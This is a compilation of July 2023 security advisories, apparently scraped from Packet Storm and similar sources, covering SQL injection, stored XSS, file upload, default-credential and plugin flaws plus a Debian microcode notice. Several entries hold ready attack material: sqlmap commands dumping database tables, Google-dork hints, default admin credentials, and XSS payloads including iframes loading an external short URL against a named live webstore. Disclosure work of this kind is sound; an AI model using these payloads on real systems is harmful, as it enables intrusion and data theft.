AMSS++ version 5.21.09 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : AMSS++ V5.21.09 JT SQL injection Vulnerability                                                                     || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 115.0.2(64-bit)                                            | | # Vendor    : http://amssplus.ubn4.go.th/amssplus_download/amssplus_full_update_5_21.rar                                         |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /modules/mail/main/maildetail.php?id=174 <===== inject here D:\sqlmap>sqlmap.py -u https://127.0.0.1/amss.ictkan2com/modules/mail/main/maildetail.php?id=174 --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --tables -D admin_amssGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

AMSS++ 5.21.09 SQL Injection

AMS Logistics version 2.2 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : AMS LOGISTICS 2.2 SQL injection Vulnerability                                                                      || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : https://www.amslogistics.co.th/#software                                                                           |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /ai_news_read.php?l_id=AMS23050001 <===== inject here [+] https://127.0.0.1/wtheailogisticscom/ai_news_read.php?l_id=AMS23050001Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

AMS Logistics 2.2 SQL Injection

Aicte India LMS version 3.0 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : Aicte india LMS 3.0 SQL injection Vulnerability                                                                    || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 115.0.2(64-bit)                                            | | # Vendor    : https://codecanyon.net/                                                                                            |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /committee.php?n=ANTI-RAGGING <===== inject here [+] D:\sqlmap>sqlmap.py -u http://vtcbcsreduin/committee.php?n=ANTI-RAGGING  --tables -D vcbtanyb_auctionGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

Aicte India LMS 3.0 SQL Injection

Buzzy News Viral Lists Polls and Videos version 2.5.1 appears to leave default credentials installed after installation.

**Buzzy News Viral Lists Polls And Videos 2.5.1 Insecure Settings**

Posted Jul 27, 2023

Authored by indoushka

Buzzy News Viral Lists Polls and Videos version 2.5.1 appears to leave default credentials installed after installation.

tags | exploit

SHA-256 | 5ed91b51bdf7efaa67ae9bf7fba6a1066c2ab71217d47b8a8ad0b9d7d469dbaa

Download | Favorite | View

**Buzzy News Viral Lists Polls And Videos 2.5.1 Insecure Settings**

    ======================================================================================================================================| # Title     : Buzzy - News Viral Lists Polls and Videos V 2.5.1 Insecure Settings Vulnerability                                    || # Author    : indoushka                                                                                                            || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 115.0.2(64-bit)                                              || # Vendor    : https://codecanyon.net/item/buzzy-news-viral-lists-polls-and-videos/13300279?s_rank=4                                |  | # Dork      : "buzzy /profile/admin/ Copyright © Buzzy. All rights reserved."                                                      |======================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  appears to leave default credentials installed after installation.[+]  Use Admin : admin@admin.com & Pass : admin[+]  http://127.0.0.1/clickhungamacom/Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,789)
*   Arbitrary (16,166)
*   BBS (2,859)
*   Bypass (1,736)
*   CGI (1,025)
*   Code Execution (7,248)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,336)
*   DoS (23,383)
*   Encryption (2,365)
*   Exploit (51,681)
*   File Inclusion (4,215)
*   File Upload (969)
*   Firewall (821)
*   Info Disclosure (2,758)
*   Intrusion Detection (891)
*   Java (3,037)
*   JavaScript (851)
*   Kernel (6,656)
*   Local (14,442)
*   Magazine (586)
*   Overflow (12,666)
*   Perl (1,423)
*   PHP (5,140)
*   Proof of Concept (2,338)
*   Protocol (3,584)
*   Python (1,531)
*   Remote (30,691)
*   Root (3,577)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,638)
*   Security Tool (7,878)
*   Shell (3,177)
*   Shellcode (1,212)
*   Sniffer (894)
*   Spoof (2,196)
*   SQL Injection (16,324)
*   TCP (2,398)
*   Trojan (687)
*   UDP (885)
*   Virus (664)
*   Vulnerability (31,727)
*   Web (9,624)
*   Whitepaper (3,748)
*   x86 (962)
*   XSS (17,882)
*   Other

**File Archives**

*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,797)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,284)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,612)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,780)
*   UNIX (9,271)
*   UnixWare (186)
*   Windows (6,565)
*   Other

Buzzy News Viral Lists Polls And Videos 2.5.1 Insecure Settings

A vulnerability, which was classified as problematic, was found in GZ Scripts Availability Booking Calendar PHP 1.0. This affects an unknown part of the file /index.php?controller=GzUser&action=edit&id=1 of the component Image Handler. The manipulation of the argument img leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-235569 was assigned to this vulnerability.

**Full Disclosure mailing list archives****Availability Booking Calendar PHP - Stored XSS and Unrestricted File Upload**

_From_: Andrey Stoykov <mwebsec () gmail com>  
_Date_: Sat, 22 Jul 2023 22:39:05 +0300  

\# Exploit Title: Availability Booking Calendar PHP - Multiple Issues
# Date: 07/2023
# Exploit Author: Andrey Stoykov
# Tested on: Ubuntu 20.04
# Blog: http://msecureltd.blogspot.com

XSS #1:

Steps to Reproduce:

1. Browse to Bookings
2. Select All Bookings
3. Edit booking and select Promo Code
4. Enter payload TEST"><script>alert(\`XSS\`)</script>


// HTTP POST request

POST
/AvailabilityBookingCalendarPHP/index.php?controller=GzBooking&action=edit
HTTP/1.1
Host: hostname
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)
Gecko/20100101 Firefox/114.0
\[...\]

\[...\]
edit\_booking=1&calendars\_price=900&extra\_price=0&tax=10&deposit=91&promo\_code=TEST%22%3E%3Cscript%3Ealert%28%60XSS%60%29%3C%2Fscript%3E&discount=0&total=910&create\_booking=1
\[...\]

// HTTP response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 205
\[...\]



// HTTP GET request to Bookings page

GET
/AvailabilityBookingCalendarPHP/index.php?controller=GzBooking&action=edit&id=2
HTTP/1.1
Host: hostname
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)
Gecko/20100101 Firefox/114.0
\[...\]


// HTTP response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 33590
\[...\]

\[...\]
<label class="control-label" for="promo\_code">Promo code:</label>
            <input id="promo\_code" class="form-control input-sm"
type="text" name="promo\_code" size="25"
value="TEST"><script>alert(\`XSS\`)</script>" title="Promo code"
placeholder="">
        </div>
\[...\]



Unrestricted File Upload #1:


// SVG file contents

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "
http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd";>

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg";>
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900"
stroke="#004400"/>
   <script type="text/javascript">
      alert(\`XSS\`);
   </script>
</svg>


Steps to Reproduce:

1. Browse My Account
2. Image Browse -> Upload
3. Then right click on image
4. Select Open Image in New Tab


// HTTP POST request

POST
/AvailabilityBookingCalendarPHP/index.php?controller=GzUser&action=edit&id=1
HTTP/1.1
Host: hostname
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)
Gecko/20100101 Firefox/114.0
\[...\]

\[...\]
-----------------------------13831219578609189241212424546
Content-Disposition: form-data; name="img"; filename="xss.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "
http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd";>

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg";>
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900"
stroke="#004400"/>
   <script type="text/javascript">
      alert(\`XSS\`);
   </script>
</svg>
\[...\]


// HTTP response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 190
\[...\]
\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

**Current thread:**

*   **Availability Booking Calendar PHP - Stored XSS and Unrestricted File Upload** _Andrey Stoykov (Jul 25)_

CVE-2023-3970: Full Disclosure: Availability Booking Calendar PHP

The ACF Photo Gallery Field plugin for WordPress is vulnerable to unauthorized modification of data due to an insufficient restriction on the 'apg_profile_update' function in versions up to, and including, 1.9. This makes it possible for authenticated attackers, with subscriber-level permissions or above, to update the user metas arbitrarily. The meta value can only be a string.

Line

 

1

<?php

2

3

// exit if accessed directly

4

if( ! defined( 'ABSPATH' ) ) exit;

5

6

//Fires off when the WordPress update button is clicked

7

function acf\_photo\_gallery\_save( $post\_id ){

8

       

9

        // If this is a revision, get real post ID

10

        if ( $parent\_id \= wp\_is\_post\_revision( $post\_id ) )

11

        $post\_id \= $parent\_id;

12

        // unhook this function so it doesn't loop infinitely

13

        remove\_action( 'save\_post', 'acf\_photo\_gallery\_save' );

14

15

        $field \= !empty($\_POST\['acf-photo-gallery-groups'\])? $\_POST\['acf-photo-gallery-groups'\]: array();

16

        $field \= array\_map('sanitize\_text\_field', $field );

17

18

        if( !empty($field) ){

19

                $field\_key \= sanitize\_text\_field($\_POST\['acf-photo-gallery-field'\]);

20

                foreach($field as $k \=> $v ){

21

                        $field\_id \= isset($\_POST\['acf-photo-gallery-groups'\]\[$k\])? sanitize\_text\_field($\_POST\['acf-photo-gallery-groups'\]\[$k\]): null;

22

            if (!empty($field\_id)) {

23

                $ids \= !empty($\_POST\[$field\_id\])? array\_map('sanitize\_text\_field', $\_POST\[$field\_id\]): null;

24

                                if (!empty($ids)) {

25

                    $ids \= implode(',', $ids);

26

                    update\_post\_meta($post\_id, $field\_id, $ids);

27

                    acf\_update\_metadata($post\_id, $field\_id, $field\_key, true);

28

                } else {

29

                    delete\_post\_meta($post\_id, $v);

30

                    acf\_delete\_metadata($post\_id, $field\_id, true);

31

                }

32

            }

33

                }

34

        }

35

36

        // re-hook this function

37

        add\_action( 'save\_post', 'acf\_photo\_gallery\_save' );

38

}

39

add\_action( 'save\_post', 'acf\_photo\_gallery\_save' );

40

41

add\_action( 'profile\_update', 'apg\_profile\_update', 10, 2 );

42

function apg\_profile\_update( $user\_id, $old\_user\_data ){

43

        $group \= $\_POST\['acf-photo-gallery-groups'\];

44

        if( is\_array($group) && count($group) \> 0 ){

45

                foreach($group as $item){

46

                        $d \= $\_POST\[$item\];

47

                        update\_user\_meta($user\_id, $item, implode(',', $d));

48

                }

49

        }

50

}

CVE-2023-3957: acf_photo_gallery_save.php in navz-photo-gallery/tags/1.9/includes – WordPress Plugin Repository

The InstaWP Connect plugin for WordPress is vulnerable to unauthorized access of data, modification of data and loss of data due to a missing capability check on the 'events_receiver' function in versions up to, and including, 0.0.9.18. This makes it possible for unauthenticated attackers to add, modify or delete post and taxonomy, install, activate or deactivate plugin, change customizer settings, add or modify or delete user including administrator user.

CVE-2023-3956: class-instawp-rest-apis.php in instawp-connect/tags/0.0.9.18/includes – WordPress Plugin Repository

Debian Linux Security Advisory 5459-1 - Tavis Ormandy discovered that under specific microarchitectural circumstances, a vector register in "Zen 2" CPUs may not be written to 0 correctly. This flaw allows an attacker to leak register contents across concurrent processes, hyper threads and virtualized guests.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5459-1                   security@debian.org  
https://www.debian.org/security/                     Salvatore Bonaccorso  
July 25, 2023                         https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : amd64-microcode  
CVE ID         : CVE-2023-20593  
Debian Bug     : 1041863

Tavis Ormandy discovered that under specific microarchitectural  
circumstances, a vector register in "Zen 2" CPUs may not be written to 0  
correctly. This flaw allows an attacker to leak register contents across  
concurrent processes, hyper threads and virtualized guests.

For details please refer to  
https://lock.cmpxchg8b.com/zenbleed.html  
https://github.com/google/security-research/security/advisories/GHSA-v6wh-rxpg-cmm8

The initial microcode release by AMD only provides updates for second  
generation EPYC CPUs: Various Ryzen CPUs are also affected, but no  
updates are available yet. Fixes will be provided in a later update once  
they are released.

For more specific details and target dates please refer to the AMD  
advisory at  
https://www.amd.com/en/resources/product-security/bulletin/amd-sb-7008.html

For the oldstable distribution (bullseye), this problem has been fixed  
in version 3.20230719.1~deb11u1. Additionally the update contains a fix  
for CVE-2019-9836.

For the stable distribution (bookworm), this problem has been fixed in  
version 3.20230719.1~deb12u1.  
We recommend that you upgrade your amd64-microcode packages.

For the detailed security status of amd64-microcode please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/amd64-microcode

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmTAOR1fFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0Rncg/9Hl5y0YP0GpLU0RtfWXOKZw/TLqJ2Ia5Xn29IYZ+SQfBgS1nqpX+J9xQP  
y4x8DvjRacj30IhC2wkaczkNm8FvbIiqedraVrUj9ZMmVWoQohIZWrsnwuWbZRlz  
Dium6J+tFXG3azP/1rAc1bZAd0kUnc8r6jmOpluh5KpQf1+KqRUWQuVopG1N9SZC  
FC7nAMhLE9E2/dITj2i4InP0CG/+uqlJO5S9rGfKaPHpTK2vjDzJr3yWGQ4yS/so  
mc+l9nkHb2+UEEHDQ9HMN7A5AuYPk1vU49YOQ+FsgdFamhpchTrf/JbljCtg0WpZ  
JFok1N1MizHxXQ0S5UdFYaFV//4yW7gPhnlq5hAr4G2czAaOEOZWfzNN+dRJGtvq  
DNQd/B08ZqlTxEqNWZS5I3YOgITUm0pUYXPqneZsdOlMJD4/qkXn9WT6a9zo3yMU  
sumxBGgaXMTV68K7qzFQTVYBMJt2vO3e8JThMClU/MRUe1lfwyCMVawsmtxrHtr0  
zF/7NUZteXND9vD1fmY6b0V9Owerms9PitPmlahi3++PX3RvXcrZxC7HXFKGmEva  
nYapN0Kl4TvkWhpGoZHANsjHdyle4q/DrhgEv331IA+btTVSbiesKBZhTIfdmM2G  
IsaZXtP2GL6igyrPBV09Sm6YheVMc3FiENs7tTpBqyQIoARTZUQ=  
=WvUu  
-----END PGP SIGNATURE-----

Debian Security Advisory 5459-1

ETSI WEBstore 2023 suffers from a persistent cross site scripting vulnerability.

    Document Title:===============ETSI WEBstore 2023 - Persistent Cross Site VulnerabilityReferences (Source):====================https://www.vulnerability-lab.com/get_content.php?id=2327Release Date:=============2023-07-26Vulnerability Laboratory ID (VL-ID):====================================2327Common Vulnerability Scoring System:====================================4.6Vulnerability Class:====================Cross Site Scripting - PersistentCurrent Estimated Price:========================1.000€ - 2.000€Abstract Advisory Information:==============================The vulnerability laboratory core research team discovered a persistent web vulnerability in the ETSI WebStore web-application.Affected Product(s):====================European Telecommunications Standards Institute (ETSI)Product: WEBstore 2023 - User Management (Web-Application)Vulnerability Disclosure Timeline:==================================2023-07-26: Public Disclosure (Vulnerability Laboratory)Discovery Status:=================PublishedExploitation Technique:=======================RemoteSeverity Level:===============MediumAuthentication Type:====================Restricted Authentication (User Privileges)User Interaction:=================Low User InteractionDisclosure Type:================Independent Security ResearchTechnical Details & Description:================================A persistent input validation web vulnerability has been discovered in the official ETSI Webstore 2023 web-application.The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromisebrowser to web-application requests from the application-side.The vulnerability is located in the all input fields of the NewOrModifyCustomer.asp registration / modify formular.Remote attackers are able to inject own malicious script code with persistent attack vector by an inject in thewrong sanitized input fields. The injection point is the registration or modify formular of the webstore.The execution points are located in the index, listarticle, myprofiles and user backend listing of the webstoreweb-appliation service.Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistentexternal redirects to malicious source and persistent manipulation of affected application modules.Request Methode:[+] POSTVulnerable Inputs:[+] first name[+] last name[+] company name[+] addressAffected Modules:[+] MyProfile[+] ListArticle[+] ShowCustomerProof of Concept (PoC):=======================The persistent input validation web vulnerability can be exploited by remote attackers with low privileged user account and low user interaction.For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue.Manual steps to reproduce the vulnerability ...1. Register an account for the etsi webstore using the registration formular2. Inject script code payloads to the firstname, lastname, companyname and address input fields3. Save the account by submit via post method request4. Confirm the email and logon to the accountNote: After the login the execution takes place in the header were the user data is show as well as in separated websites were adress data is displayed. On preview of the customer in the backend an execution of the malicious payload takes as well place.5. Successful reproduce of the persistent web vulnerability!--- PoC Session Logs (POST) [Inject & Execute] ---https://webstore.etsi.org/ecommerce/ShowHideCustomer.aspHost: webstore.etsi.orgAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: de,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencodedContent-Length: 906Origin:https://webstore.etsi.orgConnection: keep-aliveReferer:https://webstore.etsi.org/ecommerce/NewOrModifyCustomer.aspCookie: list=2; _ga_L34WJL1P2Z=GS1.1.1690359581.2.1.1690359631.0.0.0; _ga=GA1.1.1806199158.1690355803; ASPSESSIONIDSWABCBBQ=IHBHHHFAJLDMIDCJINGNGIIKUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1NewOrExisting=NEW&eMail=tammy23@protonmail.com&password=cryptoag2&Company=A"><iframe src=https://shorturl.at/uFGNV  onload=alert('TEA1-2-3-4')></iframe>&ClientCode=&ClientCodeCSA3=,&Fname=B"><iframe src=https://shorturl.at/uFGNV  onload=alert('TEA1-2-3-4')></iframe>&member_orga_id=16173&Lname=C"><iframe src=https://shorturl.at/uFGNV  onload=alert('TEA1-2-3-4')></iframe>&Address1=D"><iframe src=https://shorturl.&PostalCode=51221&Address2=E"><iframe src=https://shorturl.&City=Bremen"><iframe src=https://shorturl.at/uFGNV  onload=alert('TEA1-2-3-4')></iframe>&Address3=F"><iframe src=https://shorturl.&Country=ALALBANIA&Phone=234534654364&Fax=&VATID=&FORM_DISCLAIMER=on&FORM_CAPTCHA=S430Q2&Submit=Submit-POST: HTTP/2.0 302 Foundcache-control: privatecontent-type: text/htmllocation: Listarticle.asp?list=2server: Microsoft-IIS/10.0x-frame-options: SAMEORIGINcontent-length: 143-https://webstore.etsi.org/ecommerce/Listarticle.asp?list=2Host: webstore.etsi.orgAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: de,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflate, brReferer:https://webstore.etsi.org/ecommerce/NewOrModifyCustomer.aspConnection: keep-aliveCookie: list=2; _ga_L34WJL1P2Z=GS1.1.1690359581.2.1.1690359631.0.0.0; _ga=GA1.1.1806199158.1690355803; ASPSESSIONIDSWABCBBQ=IHBHHHFAJLDMIDCJINGNGIIKUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1-POST: HTTP/2.0 200 OKcache-control: privatecontent-type: text/htmlcontent-encoding: gzipvary: Accept-Encodingserver: Microsoft-IIS/10.0set-cookie: list=2; path=/ecommercex-frame-options: SAMEORIGIN-https://webstore.etsi.org/ecommerce/ShowHideCustomer.aspHost: webstore.etsi.orgAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: de,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencodedContent-Length: 906Origin:https://webstore.etsi.orgConnection: keep-aliveReferer:https://webstore.etsi.org/ecommerce/NewOrModifyCustomer.aspCookie: list=2; _ga_L34WJL1P2Z=GS1.1.1690359581.2.1.1690359631.0.0.0; _ga=GA1.1.1806199158.1690355803; ASPSESSIONIDSWABCBBQ=IHBHHHFAJLDMIDCJINGNGIIKUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1NewOrExisting=NEW&eMail=tammy23@protonmail.com&password=cryptoag3&Company=A"><iframe src=https://shorturl.at/uFGNV  onload=alert('TEA1-2-3-4')></iframe>&ClientCode=&ClientCodeCSA3=,&Fname=B"><iframe src=https://shorturl.at/uFGNV  onload=alert('TEA1-2-3-4')></iframe>&member_orga_id=16173&Lname=C"><iframe src=https://shorturl.at/uFGNV  onload=alert('TEA1-2-3-4')></iframe>&Address1=D"><iframe src=https://shorturl.&PostalCode=51221&Address2=E"><iframe src=https://shorturl.&City=Bremen"><iframe src=https://shorturl.at/uFGNV  onload=alert('TEA1-2-3-4')></iframe>&Address3=F"><iframe src=https://shorturl.&Country=ALALBANIA&Phone=234534654364&Fax=&VATID=&FORM_DISCLAIMER=on&FORM_CAPTCHA=S430Q2&Submit=Submit-POST: HTTP/2.0 302 Foundcache-control: privatecontent-type: text/htmllocation: Listarticle.asp?list=2server: Microsoft-IIS/10.0x-frame-options: SAMEORIGINcontent-length: 143-https://webstore.etsi.org/ecommerce/Listarticle.asp?list=2Host: webstore.etsi.orgAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: de,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflate, brReferer:https://webstore.etsi.org/ecommerce/NewOrModifyCustomer.aspConnection: keep-aliveCookie: list=2; _ga_L34WJL1P2Z=GS1.1.1690359581.2.1.1690359631.0.0.0; _ga=GA1.1.1806199158.1690355803; ASPSESSIONIDSWABCBBQ=IHBHHHFAJLDMIDCJINGNGIIKUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1-POST: HTTP/2.0 200 OKcache-control: privatecontent-type: text/htmlcontent-encoding: gzipvary: Accept-Encodingserver: Microsoft-IIS/10.0set-cookie: list=2; path=/ecommercex-frame-options: SAMEORIGINVulnerable Source: Profile Header<div id="bloclogin"><div id="identify"><b> B[MALICIOUS PAYLOAD EXECUTION]"><iframe src="https://shorturl.at/uFGNV"  onload="alert('TEA1-2-3-4')"></iframe>&nbsp;C[MALICIOUS PAYLOAD EXECUTION]"><iframe src="https://shorturl.at/uFGNV"  onload="alert('TEA1-2-3-4')"></iframe></b><br>A[MALICIOUS PAYLOAD EXECUTION]"><iframe src="https://shorturl.at/uFGNV"  onload="alert('TEA1-2-3-4')"></iframe></div><input type="button" onclick="window.location.href = '/ecommerce/ChangeExistingCustomer.asp'" value="My profile" id="inputheaderleft"><input type="button" onclick="logout()" value="Logout" id="inputheaderright"></div>Vulnerable Source: MyProfile<tr><td class="formlabel"><label for="Company">Company name</label></td><td class="forminputleft"><input tabindex="1" id="Company" class="inputform" name="Company" placeholder="Company name" value="A[MALICIOUS PAYLOAD EXECUTION]"><iframe src="https://shorturl.at/uFGNV"  onload="alert('TEA1-2-3-4')"></iframe>"/></td><td class="formlabel">Client Code       </td><td><input type="hidden" name="ClientCode" value=""><input type="hidden" name="ClientCodeCSA3" value=""><input type="hidden" name="ClientCodeCSA3" value="">                    </td></tr><tr><td colspan="2">                         </td>        <td class="formlabel"><label for="Fname">First name <font color="red">*</font></label></td><td class="forminputright"><input id="Fname" tabindex="3" class="inputform" name="Fname" placeholder="First name" value="B[MALICIOUS PAYLOAD EXECUTION]"><iframe src="https://shorturl.at/uFGNV"  onload="alert('TEA1-2-3-4')"></iframe>"></td></tr><tr><td class="formlabellong">...  </td><td class="formlabel"><label for="Lname">Last name <font color="red">*</font></label></td><td><input id="Lname" tabindex="6" class="inputform" placeholder="Last name" name="Lname" value="C[MALICIOUS PAYLOAD EXECUTION]"><iframe src="https://shorturl.at/uFGNV"  onload="alert('TEA1-2-3-4')"></iframe>"></td></tr>References:https://webstore.etsi.org/ecommerce/https://webstore.etsi.org/ecommerce/Listarticle.asphttps://webstore.etsi.org/ecommerce/ShowHideCustomer.asphttps://webstore.etsi.org/ecommerce/NewOrModifyCustomer.aspSecurity Risk:==============The security risk of the persistent vulnerability in the webstore web-application of etsi is estimated as medium.Credits & Authors:==================L. Guenther -https://www.vulnerability-lab.com/show.php?user=L.+GuentherDisclaimer & Information:=========================The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Labor its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profitsor special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states donot allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.Domains:   https://www.vulnerability-lab.com  ;  https://www.vuln-lab.com  ;https://www.vulnerability-db.comAny modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of othermedia, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and otherinformation on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use oredit our material contact (admin@ or research@) to get a ask permission.            Copyright © 2023 | Vulnerability Laboratory - [Evolution Security GmbH]™-- VULNERABILITY LABORATORY (VULNERABILITY LAB)RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE

ETSI WEBstore 2023 Cross Site Scripting

SQL injection vulnerability found in PrestaShop sendinblue v.4.0.15 and before allow a remote attacker to gain privileges via the ajaxOrderTracking.php component.

In the module “Sendinblue - All-in-one marketing tool” (sendinblue) up to versions 4.0.14 from Sendinblue for PrestaShop, an anonymous user can perform SQL injection in affected versions if double optin is enabled. 4.0.15 fixed vulnerabilities.

**Summary**

*   **CVE ID**: CVE-2023-26859
*   **Published at**: 2023-07-25
*   **Advisory source**: Friends-of-Presta.org
*   **Platform**: PrestaShop
*   **Product**: sendinblue
*   **Impacted release**: <= 4.0.14 (4.0.15 fixed the vulnerability)
*   **Product author**: Sendinblue
*   **Weakness**: CWE-89
*   **Severity**: high (8.1)

**Description**

In sendinblue module for PrestaShop up to 4.0.14, a sensitive SQL call on ajaxOrderTracking.php can be executed with a trivial http call and exploited to forge a blind SQL injection throught for instance the POST or GET submitted id_shop_group variable if the double optin option is set.

**CVSS base metrics**

*   **Attack vector**: network
*   **Attack complexity**: high
*   **Privilege required**: none
*   **User interaction**: none
*   **Scope**: unchanged
*   **Confidentiality**: high
*   **Integrity**: high
*   **Availability**: high

**Vector string**: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

**Possible malicious usage**

*   Obtain admin access
*   Remove data from the associated PrestaShop
*   Copy/paste data from sensitive tables to FRONT to expose tokens and unlock admins’s ajax scripts
*   Rewrite SMTP settings to hijack emails

**Patch**

For PrestaShop 1.6, with sendingblue version 2.8.8, apply this patch:

    --- a/modules/sendinblue/ajaxOrderTracking.php
    +++ b/modules/sendinblue/ajaxOrderTracking.php
    @@ -59,7 +59,7 @@ if ($sendin_order_track_status == 0) {
             $dateFormate = 'm-d-Y';
         }
         $condition = '';
    -    $id_shop_group = !empty($id_shop_group) ? $id_shop_group : 'NULL';
    +    $id_shop_group = !empty($id_shop_group) ? (int) $id_shop_group : 'NULL';
         $id_shop = !empty($id_shop) ? $id_shop : 'NULL';
         
         if ($id_shop === 'NULL' && $id_shop_group === 'NULL') {
    
    

For PrestaShop 1.7, with sendingblue version 4.x, _remove all files ajaxXXX.php_ especially _ajaxOrderTracking.php_.

**Other recommandations**

*   It’s **highly recommended to upgrade the module** to the latest version or to **delete** the module if unused.
*   Upgrade PrestaShop to the latest version to disable multiquery execution (separated by “;”) - be warned that this functionality **WILL NOT** protect your SHOP against injection SQL which uses the UNION clause to steal data.
